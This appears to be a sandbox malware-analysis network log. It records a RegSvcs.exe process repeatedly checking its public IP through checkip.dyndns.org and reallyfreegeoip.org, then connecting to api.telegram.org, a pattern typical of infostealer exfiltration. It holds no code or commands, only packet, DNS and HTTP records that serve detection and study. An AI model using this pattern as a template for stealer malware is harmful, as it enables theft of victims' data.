                                                                                                                                  Dec 16, 2024 13:37:15.900494099 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:15.901135921 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:16.336560965 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.456681967 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:16.456777096 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.457046986 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.577110052 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.554649115 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.556231976 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556271076 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.556374073 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556663036 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556678057 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.607485056 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:18.837696075 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:18.869643927 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:18.869679928 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284445047 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284507036 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284554958 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:19.285470963 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:19.290592909 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.292072058 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.410686016 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.410769939 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.411854982 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.411962032 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.418664932 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.538768053 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.507086992 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.509010077 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509054899 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.509129047 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509516954 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509531975 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.560688019 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:21.721535921 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:21.739442110 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:21.739476919 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170304060 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170372009 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170445919 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:22.172338963 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:22.177422047 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.187901974 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.297648907 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.297712088 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.308480024 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.308557987 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.308821917 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.429163933 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.404773951 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.407084942 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407126904 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.407365084 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407677889 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407691002 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.451252937 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:24.620472908 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:24.622884035 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:24.622917891 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.071387053 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.071454048 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.072262049 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:25.072262049 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:25.076711893 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.078221083 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.196897984 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.197995901 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.198168039 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.198427916 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.198427916 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.318306923 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.296544075 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.299184084 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299237967 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.299319029 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299597025 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299611092 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.341907978 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:27.511307001 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.520122051 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.520148993 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957217932 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957295895 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957508087 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.958175898 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.961738110 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:27.963016033 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.081945896 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:28.082048893 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.082979918 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:28.083059072 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.083249092 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.203670025 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.183563948 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.185334921 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185434103 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.185570002 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185868025 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185899019 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.232533932 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:30.398967028 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.451297045 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.551383018 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.551398039 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.878866911 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.878942013 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.879076004 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.879659891 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.883002043 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:30.884324074 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.003094912 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:31.003249884 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.004095078 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:31.004180908 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.004462004 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.124814034 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.101073980 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.105231047 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105278015 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.105375051 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105662107 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105675936 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.154403925 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.321366072 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.329333067 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.329380989 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.768723965 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.768898010 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.769143105 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.769454956 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.787465096 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.908034086 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.908801079 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.930661917 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.930726051 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.930836916 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.931432962 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.931457996 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.300967932 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.301131964 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.305711985 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.305722952 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.306216002 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.307867050 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.355329037 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803402901 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803489923 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803596020 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.879654884 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:50.368917942 CET4970880192.168.2.8193.122.130.0
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 16, 2024 13:37:06.623429060 CET6152153192.168.2.81.1.1.1
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET53615211.1.1.1192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:08.687918901 CET5355453192.168.2.81.1.1.1
                                                                                                                                  Dec 16, 2024 13:37:09.155798912 CET53535541.1.1.1192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.788218975 CET5123553192.168.2.81.1.1.1
                                                                                                                                  Dec 16, 2024 13:37:33.927192926 CET53512351.1.1.1192.168.2.8
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 16, 2024 13:37:06.623429060 CET192.168.2.81.1.1.10x507fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:08.687918901 CET192.168.2.81.1.1.10xc50bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:33.788218975 CET192.168.2.81.1.1.10xfbc8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:06.761351109 CET1.1.1.1192.168.2.80x507fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:09.155798912 CET1.1.1.1192.168.2.80xc50bNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:09.155798912 CET1.1.1.1192.168.2.80xc50bNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                  Dec 16, 2024 13:37:33.927192926 CET1.1.1.1192.168.2.80xfbc8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • checkip.dyndns.org
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.849705193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:06.892929077 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:08.265475035 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:08 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: e0b9244e46191548d97edf16dd5e1fab
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 16, 2024 13:37:08.272860050 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 16, 2024 13:37:08.645967007 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:08 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: aa40f9c69a17275c66b0a75ea53e7732
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 16, 2024 13:37:10.983530998 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 16, 2024 13:37:11.325221062 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:11 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 52d6f3eeb987d82fb02fddda2d304e79
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.849708193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:13.118542910 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 16, 2024 13:37:14.230257034 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:14 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 8ebd0910ee945d001ffb0dc419e2649b
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.849710193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:16.457046986 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:17.554649115 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:17 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: c209dadd30e49be97074619c948e01e0
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.849712193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:19.418664932 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:20.507086992 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 67ada7149c52fc30ecff77fd270002c9
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.849714193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:22.308821917 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:23.404773951 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 69cf4b293719b0b20182e518009796c1
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.849719193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:25.198427916 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:26.296544075 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:26 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 352739f19f0e93c475cc342ec41f5119
